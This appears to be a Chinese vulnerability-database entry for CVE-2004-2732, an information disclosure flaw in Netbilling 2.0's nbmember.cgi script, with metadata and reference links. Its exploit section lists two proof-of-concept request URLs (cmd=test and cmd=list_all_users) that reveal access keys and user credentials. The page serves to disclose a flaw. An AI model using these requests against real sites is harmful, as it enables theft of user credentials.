Netbilling NBMEMBER脚本信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108238 漏洞类型 操作系统命令注入
发布时间 2004-10-22 更新时间 2007-10-10
CVE编号 CVE-2004-2732 CNNVD-ID CNNVD-200412-686
漏洞平台 CGI CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24700
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-686
|漏洞详情
Netbilling2.0版本的nbmember.cgi存在漏洞。远程攻击者可以借助cmd=test选项获得敏感信息,该漏洞可以被运用到确定访问密钥。
|漏洞EXP
source: http://www.securityfocus.com/bid/11504/info

Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.

http://www.example.com/cgi-bin/nbmember.cgi?cmd=test
http://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword
|参考资料

来源:XF
名称:netbilling-information-disclosure(17865)
链接:http://xforce.iss.net/xforce/xfdb/17865
来源:BID
名称:11504
链接:http://www.securityfocus.com/bid/11504
来源:OSVDB
名称:10902
链接:http://www.osvdb.org/10902
来源:web.archive.org
链接:http://web.archive.org/web/20041106200147/http://www.it-helpnet.de/bugless/bugs.php?mode=show&id=8&SID=
来源:SECTRACK
名称:1011881
链接:http://securitytracker.com/id?1011881